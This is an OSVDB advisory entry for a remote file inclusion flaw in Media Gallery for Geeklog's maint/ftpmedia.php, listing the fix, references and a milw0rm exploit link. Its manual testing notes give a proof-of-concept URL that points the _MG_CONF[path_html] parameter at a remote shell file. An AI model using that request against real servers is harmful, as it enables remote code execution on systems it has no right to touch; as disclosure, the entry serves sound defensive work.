Media Gallery for Geeklog maint/ftpmedia.php _MG_CONF[path_html] Variable Remote File Inclusion

2007-05-14T11:18:50
ID OSVDB:36239
Type osvdb
Reporter OSVDB
Modified 2007-05-14T11:18:50

Description

Technical Description

This vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).

Solution Description

Upgrade to version 1.4.8b or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

Manual Testing Notes

http://[target]/mediagallery/public_html/maint/ftpmedia.php?_MG_CONF[path_html]= shell.txt?

References:

Secunia Advisory ID:25272 ISS X-Force ID: 34294 Generic Exploit URL: http://www.milw0rm.com/exploits/3924 FrSIRT Advisory: ADV-2007-1827 CVE-2007-2706 Bugtraq ID: 23983